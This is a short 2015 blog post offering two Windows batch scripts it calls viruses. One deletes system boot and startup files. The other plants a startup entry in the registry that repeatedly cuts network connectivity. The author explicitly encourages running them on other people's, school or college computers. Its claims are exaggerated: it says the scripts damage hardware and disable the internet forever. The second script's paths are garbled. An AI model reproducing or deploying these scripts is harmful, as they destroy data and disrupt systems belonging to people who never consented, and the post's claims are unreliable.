Thursday, 25 June 2015

Dangerous tricks

hi guys ! let me show you some dangerous tricks it will not try your own personal computer because its very dangerous this command is crash your hardware....so u wanna try other person computer or school or college computers.......




                                                   

Notepad tricks




Trick no 1:

Making a virus that crashes a pc forever.....


@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Working : It can crash the PC forever. It also deletes the files required for the startup of the computer and hence is very dangerous 
                   You must copy the code above and paste it in your notepad for making this virus.
You must ensure to save it (.bat) format by Mouse right click-rename-add (.bat) at the end of the file name.

--------------------------------------------------------------------------------------------------------------------------


Trick no 2:

A virus which can shut down the internet permanently.....


echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat

reg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t
reg_sz /d c:windowswimn32.bat /f

reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit
/t reg_sz /d c:windowswimn32.bat /f

echo YOU HAVE BEEN HACKED!!!

PAUSE


Working : This virus can shut down the internet forever and cannot be brought back unless everything reconfigured for that PC

(Copy the following script to notepad and save it as (.bat) file)

--------------------------------------------------------------------------------------------------------------------------

No comments:

Post a Comment